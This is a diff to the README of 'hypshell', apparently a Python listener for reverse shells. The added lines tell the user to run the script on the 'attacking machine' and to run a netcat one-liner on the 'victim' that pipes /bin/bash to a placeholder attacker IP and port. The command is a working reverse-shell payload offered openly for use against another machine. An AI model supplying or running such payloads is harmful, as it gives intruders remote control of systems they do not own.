Hyper100/hypshell/README.md

 # Usage
 `usage: ./hypshell.py [options] port`

+You can run the script on the attacking machine to listen for incmoing connections.

+Run this payload exmaple on the victim to start a reverse shell:
+`nc -c /bin/bash <port> <attacker_ip>`

 **NOTE: To exit the program you have to enter "exit" on the shell session even if you can't read the input**

 ## Options